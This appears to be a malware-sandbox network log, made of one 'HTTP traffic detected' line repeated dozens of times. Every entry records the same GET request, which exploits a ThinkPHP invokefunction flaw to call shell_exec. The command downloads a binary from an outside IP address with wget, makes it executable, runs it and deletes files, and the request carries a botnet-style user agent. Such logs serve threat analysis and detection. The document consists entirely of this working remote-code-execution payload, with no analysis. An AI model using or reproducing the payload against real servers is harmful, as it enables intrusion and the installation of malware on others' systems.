Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
